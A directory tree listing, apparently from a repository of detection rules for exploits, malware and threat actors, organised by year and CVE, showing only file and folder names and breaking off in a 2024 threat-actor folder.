│ ├── 2020/ │ │ ├── Exploits/ │ │ │ ├── CVE-2020-0688/ │ │ │ │ ├── web_cve_2020_0688_exchange_exploit.yml │ │ │ │ ├── web_cve_2020_0688_msexchange.yml │ │ │ │ └── win_vul_cve_2020_0688.yml │ │ │ ├── CVE-2020-10148/ │ │ │ │ └── web_cve_2020_10148_solarwinds_exploit.yml │ │ │ ├── CVE-2020-10189/ │ │ │ │ └── proc_creation_win_exploit_cve_2020_10189.yml │ │ │ ├── CVE-2020-1048/ │ │ │ │ ├── proc_creation_win_exploit_cve_2020_1048.yml │ │ │ │ └── registry_set_exploit_cve_2020_1048_new_printer_port.yml │ │ │ ├── CVE-2020-1350/ │ │ │ │ └── proc_creation_win_exploit_cve_2020_1350.yml │ │ │ ├── CVE-2020-1472/ │ │ │ │ └── proc_creation_win_exploit_cve_2020_1472_zero_poc.yml │ │ │ ├── CVE-2020-14882/ │ │ │ │ └── web_cve_2020_14882_weblogic_exploit.yml │ │ │ ├── CVE-2020-28188/ │ │ │ │ └── web_cve_2020_28188_terramaster_rce_exploit.yml │ │ │ ├── CVE-2020-3452/ │ │ │ │ └── web_cve_2020_3452_cisco_asa_ftd.yml │ │ │ ├── CVE-2020-5902/ │ │ │ │ └── web_cve_2020_5902_f5_bigip.yml │ │ │ └── CVE-2020-8193/ │ │ │ └── web_cve_2020_8193_8195_citrix_exploit.yml │ │ ├── Malware/ │ │ │ ├── Blue-Mockingbird/ │ │ │ │ ├── proc_creation_win_malware_blue_mockingbird.yml │ │ │ │ └── registry_set_mal_blue_mockingbird.yml │ │ │ ├── ComRAT/ │ │ │ │ └── proxy_malware_comrat_network_indicators.yml │ │ │ ├── Emotet/ │ │ │ │ └── proc_creation_win_malware_emotet_rundll32_execution.yml │ │ │ ├── FlowCloud/ │ │ │ │ └── registry_event_malware_flowcloud_markers.yml │ │ │ ├── Ke3chang-TidePool/ │ │ │ │ └── proc_creation_win_malware_ke3chang_tidepool.yml │ │ │ ├── Maze/ │ │ │ │ └── proc_creation_win_malware_maze_ransomware.yml │ │ │ └── Trickbot/ │ │ │ └── proc_creation_win_malware_trickbot_wermgr.yml │ │ └── TA/ │ │ ├── Evilnum/ │ │ │ └── proc_creation_win_apt_evilnum_jul20.yml │ │ ├── GALLIUM/ │ │ │ ├── proc_creation_win_apt_gallium_iocs.yml │ │ │ └── win_dns_analytic_apt_gallium.yml │ │ ├── Greenbug/ │ │ │ └── proc_creation_win_apt_greenbug_may20.yml │ │ ├── Lazarus/ │ │ │ └── 
proc_creation_win_apt_lazarus_group_activity.yml │ │ ├── Leviathan/ │ │ │ └── registry_event_apt_leviathan.yml │ │ ├── SolarWinds-Supply-Chain/ │ │ │ ├── README.md │ │ │ ├── proc_creation_win_apt_unc2452_cmds.yml │ │ │ ├── proc_creation_win_apt_unc2452_ps.yml │ │ │ ├── proc_creation_win_apt_unc2452_vbscript_pattern.yml │ │ │ └── web_solarwinds_supernova_webshell.yml │ │ ├── TAIDOOR-RAT/ │ │ │ └── proc_creation_win_apt_taidoor.yml │ │ └── Winnti/ │ │ ├── proc_creation_win_apt_winnti_mal_hk_jan20.yml │ │ └── proc_creation_win_apt_winnti_pipemon.yml │ ├── 2021/ │ │ ├── Exploits/ │ │ │ ├── CVE-2021-1675/ │ │ │ │ ├── av_exploit_cve_2021_34527_print_nightmare.yml │ │ │ │ ├── file_delete_win_exploit_cve_2021_1675_print_nightmare.yml │ │ │ │ ├── file_event_win_exploit_cve_2021_1675_printspooler.yml │ │ │ │ ├── image_load_exploit_cve_2021_1675_spoolsv_dll_load.yml │ │ │ │ ├── registry_event_cve_2021_1675_mimikatz_printernightmare_drivers.yml │ │ │ │ ├── win_exploit_cve_2021_1675_printspooler.yml │ │ │ │ ├── win_exploit_cve_2021_1675_printspooler_operational.yml │ │ │ │ ├── win_security_exploit_cve_2021_1675_printspooler_security.yml │ │ │ │ └── zeek_dce_rpc_exploit_cve_2021_1675_printnightmare_print_driver_install.yml │ │ │ ├── CVE-2021-20090/ │ │ │ │ └── web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml │ │ │ ├── CVE-2021-2109/ │ │ │ │ └── web_cve_2021_2109_weblogic_rce_exploit.yml │ │ │ ├── CVE-2021-21972/ │ │ │ │ └── web_cve_2021_21972_vsphere_unauth_rce_exploit.yml │ │ │ ├── CVE-2021-21978/ │ │ │ │ └── web_cve_2021_21978_vmware_view_planner_exploit.yml │ │ │ ├── CVE-2021-22005/ │ │ │ │ └── web_cve_2021_22005_vmware_file_upload.yml │ │ │ ├── CVE-2021-22123/ │ │ │ │ └── web_cve_2021_22123_fortinet_exploit.yml │ │ │ ├── CVE-2021-22893/ │ │ │ │ └── web_cve_2021_22893_pulse_secure_rce_exploit.yml │ │ │ ├── CVE-2021-26084/ │ │ │ │ ├── proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml │ │ │ │ └── web_cve_2021_26084_confluence_rce_exploit.yml │ │ │ ├── 
CVE-2021-26814/ │ │ │ │ └── web_cve_2021_26814_wzuh_rce.yml │ │ │ ├── CVE-2021-26857/ │ │ │ │ └── proc_creation_win_exploit_cve_2021_26857_msexchange.yml │ │ │ ├── CVE-2021-26858/ │ │ │ │ ├── file_event_win_cve_2021_26858_msexchange.yml │ │ │ │ └── web_cve_2021_26858_iis_rce.yml │ │ │ ├── CVE-2021-27905/ │ │ │ │ └── web_cve_2021_27905_apache_solr_exploit.yml │ │ │ ├── CVE-2021-28480/ │ │ │ │ └── web_cve_2021_28480_exchange_exploit.yml │ │ │ ├── CVE-2021-33766/ │ │ │ │ └── web_cve_2021_33766_msexchange_proxytoken.yml │ │ │ ├── CVE-2021-33771/ │ │ │ │ ├── file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml │ │ │ │ └── registry_set_cve_2021_31979_cve_2021_33771_exploits.yml │ │ │ ├── CVE-2021-35211/ │ │ │ │ └── proc_creation_win_exploit_cve_2021_35211_servu.yml │ │ │ ├── CVE-2021-38647/ │ │ │ │ └── zeek_http_exploit_cve_2021_38647_omigod_no_auth_rce.yml │ │ │ ├── CVE-2021-4034/ │ │ │ │ └── lnx_auth_exploit_cve_2021_4034_pwnkit_lpe.yml │ │ │ ├── CVE-2021-40444/ │ │ │ │ ├── file_event_win_exploit_cve_2021_40444.yml │ │ │ │ ├── proc_creation_win_exploit_cve_2021_40444.yml │ │ │ │ └── proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml │ │ │ ├── CVE-2021-40539/ │ │ │ │ ├── web_cve_2021_40539_adselfservice.yml │ │ │ │ └── web_cve_2021_40539_manageengine_adselfservice_exploit.yml │ │ │ ├── CVE-2021-41379/ │ │ │ │ ├── file_event_win_cve_2021_41379_msi_lpe.yml │ │ │ │ ├── proc_creation_win_exploit_cve_2021_41379.yml │ │ │ │ └── win_vul_cve_2021_41379.yml │ │ │ ├── CVE-2021-41773/ │ │ │ │ └── web_cve_2021_41773_apache_path_traversal.yml │ │ │ ├── CVE-2021-42237/ │ │ │ │ └── web_cve_2021_42237_sitecore_report_ashx.yml │ │ │ ├── CVE-2021-42278/ │ │ │ │ └── win_system_exploit_cve_2021_42278.yml │ │ │ ├── CVE-2021-42287/ │ │ │ │ ├── win_security_samaccountname_spoofing_cve_2021_42287.yml │ │ │ │ └── win_system_exploit_cve_2021_42287.yml │ │ │ ├── CVE-2021-42321/ │ │ │ │ └── win_exchange_cve_2021_42321.yml │ │ │ ├── CVE-2021-43798/ │ │ │ │ └── 
web_cve_2021_43798_grafana.yml │ │ │ ├── CVE-2021-44077/ │ │ │ │ └── file_event_win_cve_2021_44077_poc_default_files.yml │ │ │ ├── CVE-2021-44228/ │ │ │ │ ├── proc_creation_win_exploit_cve_2021_44228_vmware_horizon_log4j.yml │ │ │ │ ├── web_cve_2021_44228_log4j.yml │ │ │ │ └── web_cve_2021_44228_log4j_fields.yml │ │ │ ├── ProxyShell-Exploit/ │ │ │ │ ├── web_exchange_proxyshell.yml │ │ │ │ └── web_exchange_proxyshell_successful.yml │ │ │ ├── RazerInstaller-LPE-Exploit/ │ │ │ │ └── proc_creation_win_exploit_other_razorinstaller_lpe.yml │ │ │ ├── SystemNightmare-Exploit/ │ │ │ │ └── proc_creation_win_exploit_other_systemnightmare.yml │ │ │ └── VisualDoor-Exploit/ │ │ │ ├── README.md │ │ │ └── web_sonicwall_jarrewrite_exploit.yml │ │ ├── Malware/ │ │ │ ├── BlackByte/ │ │ │ │ ├── proc_creation_win_malware_blackbyte_ransomware.yml │ │ │ │ └── registry_set_win_malware_blackbyte_privesc_registry.yml │ │ │ ├── Conti/ │ │ │ │ ├── proc_creation_win_malware_conti.yml │ │ │ │ ├── proc_creation_win_malware_conti_7zip.yml │ │ │ │ ├── proc_creation_win_malware_conti_ransomware_commands.yml │ │ │ │ └── proc_creation_win_malware_conti_ransomware_database_dump.yml │ │ │ ├── DarkSide/ │ │ │ │ └── proc_creation_win_malware_darkside_ransomware.yml │ │ │ ├── Devil-Bait/ │ │ │ │ ├── README.md │ │ │ │ ├── file_event_win_malware_devil_bait_script_drop.yml │ │ │ │ ├── proc_creation_win_malware_devil_bait_output_redirect.yml │ │ │ │ └── proxy_malware_devil_bait_c2_communication.yml │ │ │ ├── FoggyWeb/ │ │ │ │ └── image_load_malware_foggyweb_nobelium.yml │ │ │ ├── Goofy-Guineapig/ │ │ │ │ ├── README.md │ │ │ │ ├── file_event_win_malware_goofy_guineapig_file_indicators.yml │ │ │ │ ├── proc_creation_win_malware_goofy_guineapig_broken_cmd.yml │ │ │ │ ├── proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml │ │ │ │ ├── proxy_malware_goofy_gunieapig_c2_communication.yml │ │ │ │ └── win_system_malware_goofy_guineapig_service_persistence.yml │ │ │ ├── Moriya-Rootkit/ │ │ 
│ │ └── file_event_win_moriya_rootkit.yml │ │ │ ├── Netwire/ │ │ │ │ └── registry_add_malware_netwire.yml │ │ │ ├── Pingback/ │ │ │ │ ├── file_event_win_malware_pingback_backdoor.yml │ │ │ │ ├── image_load_malware_pingback_backdoor.yml │ │ │ │ └── proc_creation_win_malware_pingback_backdoor.yml │ │ │ └── Small-Sieve/ │ │ │ ├── README.md │ │ │ ├── file_event_win_malware_small_sieve_evasion_typo.yml │ │ │ ├── proc_creation_win_malware_small_sieve_cli_arg.yml │ │ │ ├── proxy_malware_small_sieve_telegram_communication.yml │ │ │ └── registry_set_malware_small_sieve_evasion_typo.yml │ │ └── TA/ │ │ ├── HAFNIUM/ │ │ │ ├── proc_creation_win_apt_hafnium.yml │ │ │ └── web_exchange_exploitation_hafnium.yml │ │ ├── Kaseya-Supply-Chain/ │ │ │ └── proc_creation_win_apt_revil_kaseya.yml │ │ ├── PRIVATELOG/ │ │ │ └── image_load_usp_svchost_clfsw32.yml │ │ ├── SOURGUM/ │ │ │ └── proc_creation_win_apt_sourgrum.yml │ │ └── UNC2546/ │ │ └── web_unc2546_dewmode_php_webshell.yml │ ├── 2022/ │ │ ├── Exploits/ │ │ │ ├── CVE-2022-21554/ │ │ │ │ └── proc_creation_win_exploit_cve_2023_21554_queuejumper.yml │ │ │ ├── CVE-2022-21587/ │ │ │ │ └── web_cve_2022_21587_oracle_ebs.yml │ │ │ ├── CVE-2022-21919/ │ │ │ │ └── win_system_exploit_cve_2022_21919_or_cve_2021_34484.yml │ │ │ ├── CVE-2022-22954/ │ │ │ │ └── proc_creation_win_exploit_cve_2022_22954_vmware_workspace_one_rce.yml │ │ │ ├── CVE-2022-24527/ │ │ │ │ └── file_event_win_cve_2022_24527_lpe.yml │ │ │ ├── CVE-2022-26134/ │ │ │ │ └── proc_creation_lnx_exploit_cve_2022_26134_atlassian_confluence.yml │ │ │ ├── CVE-2022-26809/ │ │ │ │ └── proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml │ │ │ ├── CVE-2022-27925/ │ │ │ │ └── web_cve_2022_27925_exploit.yml │ │ │ ├── CVE-2022-29072/ │ │ │ │ └── proc_creation_win_exploit_cve_2022_29072_7zip.yml │ │ │ ├── CVE-2022-29799/ │ │ │ │ └── lnx_exploit_cve_2022_27999_cve_2022_27800.yml │ │ │ ├── CVE-2022-30190/ │ │ │ │ └── registry_set_exploit_cve_2022_30190_msdt_follina.yml │ │ │ 
├── CVE-2022-31656/ │ │ │ │ └── web_cve_2022_31656_auth_bypass.yml │ │ │ ├── CVE-2022-31659/ │ │ │ │ └── web_cve_2022_31659_vmware_rce.yml │ │ │ ├── CVE-2022-33891/ │ │ │ │ ├── proc_creation_lnx_exploit_cve_2022_33891_spark_shell_command_injection.yml │ │ │ │ └── web_cve_2022_33891_spark_shell_command_injection.yml │ │ │ ├── CVE-2022-36804/ │ │ │ │ └── web_cve_2022_36804_atlassian_bitbucket_command_injection.yml │ │ │ ├── CVE-2022-37966/ │ │ │ │ └── win_system_exploit_cve_2022_37966_kdcsvc_rc4_downgrade.yml │ │ │ ├── CVE-2022-41082/ │ │ │ │ ├── proxy_cve_2022_36804_exchange_owassrf_exploitation.yml │ │ │ │ ├── proxy_cve_2022_36804_exchange_owassrf_poc_exploitation.yml │ │ │ │ ├── web_cve_2022_36804_exchange_owassrf_exploitation.yml │ │ │ │ └── web_cve_2022_36804_exchange_owassrf_poc_exploitation.yml │ │ │ ├── CVE-2022-41120/ │ │ │ │ └── proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml │ │ │ ├── CVE-2022-42475/ │ │ │ │ └── fortios_sslvpnd_exploit_cve_2022_42475_exploitation_indicators.yml │ │ │ ├── CVE-2022-44877/ │ │ │ │ └── web_cve_2022_44877_exploitation_attempt.yml │ │ │ └── CVE-2022-46169/ │ │ │ └── web_cve_2022_46169_cacti_exploitation_attempt.yml │ │ ├── Malware/ │ │ │ ├── BlueSky-Ransomware/ │ │ │ │ └── win_security_malware_bluesky_ransomware_files_indicators.yml │ │ │ ├── Bumblebee/ │ │ │ │ └── create_remote_thread_win_malware_bumblebee.yml │ │ │ ├── ChromeLoader/ │ │ │ │ └── proc_creation_win_malware_chrome_loader_execution.yml │ │ │ ├── Emotet/ │ │ │ │ └── proc_creation_win_malware_emotet_loader_execution.yml │ │ │ ├── Hermetic-Wiper/ │ │ │ │ └── proc_creation_win_malware_hermetic_wiper_activity.yml │ │ │ ├── Raspberry-Robin/ │ │ │ │ ├── proc_creation_win_malware_raspberry_robin_execution.yml │ │ │ │ ├── proc_creation_win_malware_raspberry_robin_external_drive_exec.yml │ │ │ │ └── proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml │ │ │ ├── Serpent-Backdoor/ │ │ │ │ └── 
proc_creation_win_malware_serpent_backdoor_payload_execution.yml │ │ │ ├── SocGholish/ │ │ │ │ └── proc_creation_win_malware_socgholish_fakeupdates_activity.yml │ │ │ └── win_mssql_sp_maggie.yml │ │ └── TA/ │ │ ├── ACTINIUM/ │ │ │ └── proc_creation_win_apt_actinium_persistence.yml │ │ └── MERCURY/ │ │ └── proc_creation_win_apt_mercury.yml │ ├── 2023/ │ │ ├── Exploits/ │ │ │ ├── CVE-2023-1389/ │ │ │ │ └── proxy_exploit_cve_2023_1389_unauth_command_injection_tplink_archer_ax21.yml │ │ │ ├── CVE-2023-20198/ │ │ │ │ └── cisco_syslog_cve_2023_20198_ios_xe_web_ui.yml │ │ │ ├── CVE-2023-21554/ │ │ │ │ └── win_cve_2023_21554_msmq_corrupted_packet.yml │ │ │ ├── CVE-2023-22518/ │ │ │ │ ├── proc_creation_lnx_exploit_cve_2023_22518_confluence_java_child_proc.yml │ │ │ │ ├── proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml │ │ │ │ ├── proxy_exploit_cve_2023_22518_confluence_auth_bypass.yml │ │ │ │ └── web_exploit_cve_2023_22518_confluence_auth_bypass.yml │ │ │ ├── CVE-2023-2283/ │ │ │ │ └── lnx_sshd_exploit_cve_2023_2283_libssh_authentication_bypass.yml │ │ │ ├── CVE-2023-23397/ │ │ │ │ ├── registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml │ │ │ │ ├── win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml │ │ │ │ └── win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml │ │ │ ├── CVE-2023-23752/ │ │ │ │ └── web_cve_2023_23752_joomla_exploit_attempt.yml │ │ │ ├── CVE-2023-25157/ │ │ │ │ └── web_cve_2023_25157_geoserver_sql_injection.yml │ │ │ ├── CVE-2023-25717/ │ │ │ │ └── web_cve_2023_25717_ruckus_wireless_admin_exploit_attempt.yml │ │ │ ├── CVE-2023-27363/ │ │ │ │ └── file_event_win_cve_2023_27363_foxit_rce.yml │ │ │ ├── CVE-2023-27997/ │ │ │ │ └── web_cve_2023_27997_pre_authentication_rce.yml │ │ │ ├── CVE-2023-34362-MOVEit-Transfer-Exploit/ │ │ │ │ ├── README.md │ │ │ │ ├── file_event_win_exploit_cve_2023_34362_moveit_transfer.yml │ │ │ │ ├── 
proc_creation_win_exploit_cve_2023_34362_moveit_transfer_exploitation_activity.yml │ │ │ │ └── web_cve_2023_34362_known_payload_request.yml.yml │ │ │ ├── CVE-2023-36874/ │ │ │ │ ├── file_event_win_exploit_cve_2023_36874_report_creation.yml │ │ │ │ ├── file_event_win_exploit_cve_2023_36874_wermgr_creation.yml │ │ │ │ └── proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml │ │ │ ├── CVE-2023-36884/ │ │ │ │ ├── file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml │ │ │ │ ├── proxy_exploit_cve_2023_36884_office_windows_html_rce.yml │ │ │ │ ├── proxy_exploit_cve_2023_36884_office_windows_html_rce_extenstion_ip_pattern_traffic.yml │ │ │ │ ├── proxy_exploit_cve_2023_36884_office_windows_html_rce_traffic.yml │ │ │ │ ├── proxy_exploit_cve_2023_36884_office_windows_html_rce_url_marker_traffic.yml │ │ │ │ └── win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml │ │ │ ├── CVE-2023-38831/ │ │ │ │ ├── file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml │ │ │ │ └── proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml │ │ │ ├── CVE-2023-40477/ │ │ │ │ ├── file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml │ │ │ │ └── win_application_exploit_cve_2023_40477_winrar_crash.yml │ │ │ ├── CVE-2023-43261/ │ │ │ │ ├── proxy_exploit_cve_2023_43261_milesight_information_disclosure.yml │ │ │ │ └── web_exploit_cve_2023_43261_milesight_information_disclosure.yml │ │ │ ├── CVE-2023-46214/ │ │ │ │ ├── web_cve_2023_46214_rce_splunk_enterprise.yml │ │ │ │ └── web_cve_2023_46214_rce_splunk_enterprise_poc.yml │ │ │ ├── CVE-2023-46747/ │ │ │ │ ├── proxy_cve_2023_46747_f5_remote_code_execution.yml │ │ │ │ └── web_cve_2023_46747_f5_remote_code_execution.yml │ │ │ ├── CVE-2023-4966/ │ │ │ │ ├── proxy_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit.yml │ │ │ │ ├── proxy_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit_attempt.yml │ │ │ │ ├── 
web_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit.yml │ │ │ │ └── web_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit_attempt.yml │ │ │ └── Windows-Server-Unknown-Exploit/ │ │ │ └── proc_creation_win_exploit_other_win_server_undocumented_rce.yml │ │ ├── Malware/ │ │ │ ├── COLDSTEEL/ │ │ │ │ ├── README.md │ │ │ │ ├── file_event_win_malware_coldsteel_renamed_cmd.yml │ │ │ │ ├── file_event_win_malware_coldsteel_service_dll_creation.yml │ │ │ │ ├── image_load_malware_coldsteel_persistence_service_dll.yml │ │ │ │ ├── proc_creation_win_malware_coldsteel_anonymous_process.yml │ │ │ │ ├── proc_creation_win_malware_coldsteel_cleanup.yml │ │ │ │ ├── proc_creation_win_malware_coldsteel_service_persistence.yml │ │ │ │ ├── registry_set_malware_coldsteel_created_users.yml │ │ │ │ └── win_system_malware_coldsteel_persistence_service.yml │ │ │ ├── DarkGate/ │ │ │ │ ├── README.md │ │ │ │ ├── file_event_win_malware_darkgate_autoit3_binary_creation.yml │ │ │ │ ├── proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml │ │ │ │ └── proc_creation_win_malware_darkgate_net_user_creation.yml │ │ │ ├── Griffon/ │ │ │ │ └── proc_creation_win_malware_griffon_patterns.yml │ │ │ ├── GuLoader/ │ │ │ │ └── proc_creation_win_malware_guloader_execution.yml │ │ │ ├── IcedID/ │ │ │ │ └── proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml │ │ │ ├── Pikabot/ │ │ │ │ ├── net_connection_win_malware_pikabot_rundll32_activity.yml │ │ │ │ ├── proc_creation_win_malware_pikabot_combined_commands_execution.yml │ │ │ │ ├── proc_creation_win_malware_pikabot_discovery.yml │ │ │ │ ├── proc_creation_win_malware_pikabot_rundll32_hollowing.yml │ │ │ │ └── proc_creation_win_malware_pikabot_rundll32_uncommon_extension.yml │ │ │ ├── Qakbot/ │ │ │ │ ├── README.md │ │ │ │ ├── proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml │ │ │ │ ├── proc_creation_win_malware_qakbot_rundll32_execution.yml │ │ │ │ ├── 
proc_creation_win_malware_qakbot_rundll32_exports.yml │ │ │ │ ├── proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml │ │ │ │ └── proc_creation_win_malware_qakbot_uninstaller_cleanup.yml │ │ │ ├── Rhadamanthys/ │ │ │ │ └── proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml │ │ │ ├── Rorschach/ │ │ │ │ └── proc_creation_win_malware_rorschach_ransomware_activity.yml │ │ │ ├── SNAKE/ │ │ │ │ ├── README.md │ │ │ │ ├── file_event_win_malware_snake_encrypted_payload_ioc.yml │ │ │ │ ├── file_event_win_malware_snake_installers_ioc.yml │ │ │ │ ├── file_event_win_malware_snake_werfault_creation.yml │ │ │ │ ├── proc_creation_win_malware_snake_installer_cli_args.yml │ │ │ │ ├── proc_creation_win_malware_snake_installer_exec.yml │ │ │ │ ├── proc_creation_win_malware_snake_service_execution.yml │ │ │ │ ├── registry_event_malware_snake_covert_store_key.yml │ │ │ │ ├── registry_set_malware_snake_encrypted_key.yml │ │ │ │ └── win_system_malware_snake_persistence_service.yml │ │ │ ├── Ursnif/ │ │ │ │ └── proc_creation_win_malware_ursnif_cmd_redirection.yml │ │ │ └── dns_query_win_malware_socgholish_second_stage_c2.yml │ │ └── TA/ │ │ ├── 3CX-Supply-Chain/ │ │ │ ├── README.md │ │ │ ├── dns_query_win_malware_3cx_compromise.yml │ │ │ ├── image_load_malware_3cx_compromise_susp_dll.yml │ │ │ ├── net_connection_win_malware_3cx_compromise_beaconing_activity.yml │ │ │ ├── proc_creation_win_malware_3cx_compromise_execution.yml │ │ │ ├── proc_creation_win_malware_3cx_compromise_susp_children.yml │ │ │ ├── proc_creation_win_malware_3cx_compromise_susp_update.yml │ │ │ ├── proxy_malware_3cx_compromise_c2_beacon_activity.yml │ │ │ └── proxy_malware_3cx_compromise_susp_ico_requests.yml │ │ ├── Cozy-Bear/ │ │ │ ├── image_load_apt_cozy_bear_graphical_proton_dlls.yml │ │ │ ├── win_security_apt_cozy_bear_scheduled_tasks_name.yml │ │ │ └── win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml │ │ ├── Diamond-Sleet/ │ │ │ ├── README.md │ │ │ ├── 
dns_query_win_apt_diamond_steel_indicators.yml │ │ │ ├── file_event_win_apt_diamond_sleet_indicators.yml │ │ │ ├── image_load_apt_diamond_sleet_side_load.yml │ │ │ ├── proc_creation_win_apt_diamond_sleet_indicators.yml │ │ │ ├── registry_event_apt_diamond_sleet_scheduled_task.yml │ │ │ └── win_security_apt_diamond_sleet_scheduled_task.yml │ │ ├── EquationGroup/ │ │ │ ├── net_dns_apt_equation_group_triangulation_c2_coms.yml │ │ │ └── proxy_apt_equation_group_triangulation_c2_coms.yml │ │ ├── FIN7/ │ │ │ ├── README.md │ │ │ ├── file_event_win_apt_fin7_powershell_scripts_naming_convention.yml │ │ │ ├── posh_ps_apt_fin7_powerhold.yml │ │ │ ├── posh_ps_apt_fin7_powertrash_execution.yml │ │ │ └── proc_creation_win_apt_fin7_powertrash_lateral_movement.yml │ │ ├── Lace-Tempest/ │ │ │ ├── README.md │ │ │ ├── file_event_win_apt_lace_tempest_indicators.yml │ │ │ ├── posh_ps_apt_lace_tempest_eraser_script.yml │ │ │ ├── posh_ps_apt_lace_tempest_malware_launcher.yml │ │ │ ├── proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml │ │ │ └── proc_creation_win_apt_lace_tempest_loader_execution.yml │ │ ├── Lazarus/ │ │ │ ├── README.md │ │ │ └── image_load_apt_lazarus_side_load_activity.yml │ │ ├── Mint-Sandstorm/ │ │ │ ├── README.md │ │ │ ├── proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml │ │ │ ├── proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml │ │ │ └── proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml │ │ ├── Mustang-Panda-Australia-Campaign/ │ │ │ ├── README.md │ │ │ └── proc_creation_win_apt_mustang_panda_indicators.yml │ │ ├── Okta-Support-System-Breach/ │ │ │ ├── README.md │ │ │ └── okta_apt_suspicious_user_creation.yml │ │ ├── Onyx-Sleet/ │ │ │ ├── README.md │ │ │ └── file_event_win_apt_onyx_sleet_indicators.yml │ │ ├── PaperCut-Print-Management-Exploitation/ │ │ │ ├── README.md │ │ │ ├── proc_creation_win_papercut_print_management_exploitation_indicators.yml │ │ │ └── 
proc_creation_win_papercut_print_management_exploitation_pc_app.yml │ │ ├── Peach-Sandstorm/ │ │ │ ├── proc_creation_win_apt_peach_sandstorm_indicators.yml │ │ │ └── proxy_apt_peach_sandstorm_falsefont_backdoor_c2_coms.yml │ │ └── UNC4841-Barracuda-ESG-Zero-Day-Exploitation/ │ │ ├── README.md │ │ ├── file_event_lnx_apt_unc4841_exfil_mail_pattern.yml │ │ ├── file_event_lnx_apt_unc4841_file_indicators.yml │ │ ├── proc_creation_lnx_apt_unc4841_openssl_connection.yml │ │ ├── proc_creation_lnx_apt_unc4841_wget_download_compressed_file_tmep_sh.yml │ │ ├── proc_creation_lnx_apt_unc4841_wget_download_tar_files_direct_ip.yml │ │ └── proc_creation_lnx_atp_unc4841_seaspy_execution.yml │ ├── 2024/ │ │ ├── Exploits/ │ │ │ ├── CVE-2024-1212/ │ │ │ │ └── web_exploit_cve_2024_1212_.yml │ │ │ ├── CVE-2024-1708/ │ │ │ │ ├── file_event_win_exploit_cve_2024_1708_screenconnect.yml │ │ │ │ └── win_security_exploit_cve_2024_1708_screenconnect.yml │ │ │ ├── CVE-2024-1709/ │ │ │ │ ├── file_event_win_exploit_cve_2024_1709_user_database_modification_screenconnect.yml │ │ │ │ ├── web_exploit_cve_2024_1709_screenconnect.yml │ │ │ │ └── win_security_exploit_cve_2024_1709_user_database_modification_screenconnect.yml │ │ │ ├── CVE-2024-3094/ │ │ │ │ └── proc_creation_lnx_exploit_cve_2024_3094_sshd_child_process.yml │ │ │ ├── CVE-2024-3400/ │ │ │ │ ├── file_event_paloalto_globalprotect_exploit_cve_2024_3400_command_inject_file_creation.yml │ │ │ │ └── paloalto_globalprotect_exploit_cve_2024_3400_command_injection.yml │ │ │ ├── CVE-2024-35250/ │ │ │ │ └── image_load_exploit_cve_2024_35250_privilege_escalation.yml │ │ │ ├── CVE-2024-37085/ │ │ │ │ ├── proc_creation_win_exploit_cve_2024_37085_esxi_admins_group_creation.yml │ │ │ │ └── win_security_exploit_cve_2024_37085_esxi_admins_group.yml │ │ │ ├── CVE-2024-49113/ │ │ │ │ └── win_application_error_exploit_cve_2024_49113_ldap_nightmare.yml │ │ │ └── CVE-2024-50623/ │ │ │ └── proc_creation_win_exploit_cve_2024_50623_cleo.yml │ │ ├── Malware/ │ │ │ 
├── CSharp-Streamer/ │ │ │ │ └── image_load_malware_csharp_streamer_dotnet_load.yml │ │ │ ├── DarkGate/ │ │ │ │ └── file_event_win_malware_darkgate_autoit3_save_temp.yml │ │ │ ├── Generic/ │ │ │ │ └── file_event_win_malware_generic_creation_configuration_rats.yml │ │ │ ├── KamiKakaBot/ │ │ │ │ ├── proc_creation_win_malware_kamikakabot_lnk_lure_execution.yml │ │ │ │ ├── proc_creation_win_malware_kamikakabot_schtasks_persistence.yml │ │ │ │ └── registry_set_malware_kamikakabot_winlogon_persistence.yml │ │ │ ├── Lummac-Stealer/ │ │ │ │ └── proc_creation_win_malware_lummac_more_vbc.yml │ │ │ ├── Raspberry-Robin/ │ │ │ │ ├── image_load_malware_raspberry_robin_side_load_aclui_oleview.yml │ │ │ │ ├── proc_creation_win_malware_raspberry_robin_rundll32_shell32_cpl_exection.yml │ │ │ │ └── registry_set_malware_raspberry_robin_internet_settings_zonemap_tamper.yml │ │ │ └── kapeka/ │ │ │ ├── Kapeka.md │ │ │ ├── file_event_win_malware_kapeka_backdoor_indicators.yml │ │ │ ├── image_load_malware_kapeka_backdoor_wll.yml │ │ │ ├── proc_creation_win_malware_kapeka_backdoor_persistence.yml │ │ │ ├── proc_creation_win_malware_kapeka_backdoor_rundll32_execution.yml │ │ │ ├── registry_set_malware_kapeka_backdoor_autorun_persistence.yml │ │ │ ├── registry_set_malware_kapeka_backdoor_configuration.yml │ │ │ └── win_security_malware_kapeka_backdoor_scheduled_task_creation.yml │ │ └── TA/ │ │ ├── DPRK/ │ 